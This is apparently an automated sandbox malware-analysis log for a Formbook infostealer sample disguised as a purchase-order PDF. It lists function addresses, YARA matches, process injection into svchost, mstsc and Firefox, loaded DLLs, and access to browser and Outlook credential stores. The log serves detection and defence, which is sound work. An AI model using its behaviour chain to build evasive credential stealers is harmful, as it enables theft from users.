            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045DE4F64_2_045DE4F6
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045E75714_2_045E7571
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045305354_2_04530535
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045F05914_2_045F0591
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045CD5B04_2_045CD5B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045E16CC4_2_045E16CC
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0454C6E04_2_0454C6E0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045547504_2_04554750
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045307704_2_04530770
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0452C7C04_2_0452C7C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045EF7B04_2_045EF7B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045DF0CC4_2_045DF0CC
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045370C04_2_045370C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045E70E94_2_045E70E9
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045EF0E04_2_045EF0E0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0451F1724_2_0451F172
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045FB16B4_2_045FB16B
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0456516C4_2_0456516C
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045CA1184_2_045CA118
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045201004_2_04520100
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045E81CC4_2_045E81CC
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0453B1B04_2_0453B1B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045F01AA4_2_045F01AA
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045D02744_2_045D0274
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0454B2C04_2_0454B2C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045D12ED4_2_045D12ED
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045352A04_2_045352A0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045EA3524_2_045EA352
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0451D34C4_2_0451D34C
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045E132D4_2_045E132D
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0453E3F04_2_0453E3F0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045F03E64_2_045F03E6
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0457739A4_2_0457739A
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04530C004_2_04530C00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045A9C324_2_045A9C32
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04520CF24_2_04520CF2
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045EFCF24_2_045EFCF2
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045D0CB54_2_045D0CB5
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045E1D5A4_2_045E1D5A
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04533D404_2_04533D40
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045E7D734_2_045E7D73
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0453AD004_2_0453AD00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0454FDC04_2_0454FDC0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0452ADE04_2_0452ADE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04548DBF4_2_04548DBF
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04530E594_2_04530E59
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045EEE264_2_045EEE26
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045EEEDB4_2_045EEEDB
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04542E904_2_04542E90
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045ECE934_2_045ECE93
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04539EB04_2_04539EB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045A4F404_2_045A4F40
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045EFF094_2_045EFF09
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04550F304_2_04550F30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04572F284_2_04572F28
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04522FC84_2_04522FC8
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0453CFE04_2_0453CFE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04531F924_2_04531F92
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045EFFB14_2_045EFFB1
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045328404_2_04532840
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0453A8404_2_0453A840
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0459D8004_2_0459D800
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0455E8F04_2_0455E8F0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045338E04_2_045338E0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045168B84_2_045168B8
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045399504_2_04539950
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0454B9504_2_0454B950
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045469624_2_04546962
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045329A04_2_045329A0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045FA9A64_2_045FA9A6
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045EFA494_2_045EFA49
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045E7A464_2_045E7A46
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045A3A6C4_2_045A3A6C
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045DDAC64_2_045DDAC6
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0452EA804_2_0452EA80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045CDAAC4_2_045CDAAC
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04575AA04_2_04575AA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045EAB404_2_045EAB40
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045EFB764_2_045EFB76
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045E6BD74_2_045E6BD7
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0456DBF94_2_0456DBF9
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0454FB804_2_0454FB80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_00491B504_2_00491B50
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_004951E04_2_004951E0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_004933C04_2_004933C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_004AB7B04_2_004AB7B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0048CA794_2_0048CA79
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0048CA804_2_0048CA80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0048CCA04_2_0048CCA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0048AD204_2_0048AD20
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_00E5E3784_2_00E5E378
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_00E5E4954_2_00E5E495
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_00E6540C4_2_00E6540C
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_00E5D8984_2_00E5D898
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_00E5E8334_2_00E5E833
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_00E5CA834_2_00E5CA83
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_00E5CB584_2_00E5CB58
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_00E63F694_2_00E63F69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 268 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 96 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 105 times
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 04577E54 appears 89 times
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 045AF290 appears 105 times
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 04565130 appears 36 times
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0451B970 appears 268 times
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0459EA12 appears 85 times
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: String function: 00038A80 appears 39 times
            Source: PO-78140924.BAT.PDF.exe, 00000000.00000003.2042653624.0000000004663000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-78140924.BAT.PDF.exe
            Source: PO-78140924.BAT.PDF.exe, 00000000.00000003.2041249097.000000000480D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-78140924.BAT.PDF.exe
            Source: PO-78140924.BAT.PDF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3897058690.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2158074372.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3900775999.0000000006310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2158514500.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3897432800.0000000002360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/4@11/8
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0007A0F4 GetLastError,FormatMessageW,0_2_0007A0F4
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00073C99 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00073C99
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00014FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00014FE9
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeFile created: C:\Users\user\AppData\Local\Temp\proximobuccalJump to behavior
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: mstsc.exe, 00000004.00000003.2346478807.0000000000713000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2346272846.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.0000000000740000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2349393879.000000000071D000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.0000000000713000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO-78140924.BAT.PDF.exeReversingLabs: Detection: 79%
            Source: unknownProcess created: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe"
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe"
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
            Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe"Jump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: credui.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: ktmw32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: PO-78140924.BAT.PDF.exeStatic file information: File size 1085440 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YKkstfciYBQ.exe, 00000003.00000000.2070305149.000000000077E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO-78140924.BAT.PDF.exe, 00000000.00000003.2042653624.0000000004540000.00000004.00001000.00020000.00000000.sdmp, PO-78140924.BAT.PDF.exe, 00000000.00000003.2041650984.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046417159.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048886154.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2158145354.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2170653792.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2164958755.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO-78140924.BAT.PDF.exe, 00000000.00000003.2042653624.0000000004540000.00000004.00001000.00020000.00000000.sdmp, PO-78140924.BAT.PDF.exe, 00000000.00000003.2041650984.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2046417159.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048886154.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2158145354.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2170653792.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2164958755.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mstsc.pdbGCTL source: svchost.exe, 00000002.00000003.2115002578.0000000007300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2115127900.0000000007500000.00000004.00000020.00020000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000003.2094204761.0000000003D42000.00000004.00000001.00020000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000003.2093852104.0000000003C02000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: YKkstfciYBQ.exe, 00000003.00000002.3899395542.0000000003EDC000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000004B1C000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2459301249.000000003282C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: mstsc.pdb source: svchost.exe, 00000002.00000003.2115002578.0000000007300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2115127900.0000000007500000.00000004.00000020.00020000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000003.2094204761.0000000003D42000.00000004.00000001.00020000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000003.2093852104.0000000003C02000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: YKkstfciYBQ.exe, 00000003.00000002.3899395542.0000000003EDC000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000004B1C000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2459301249.000000003282C000.00000004.80000000.00040000.00000000.sdmp
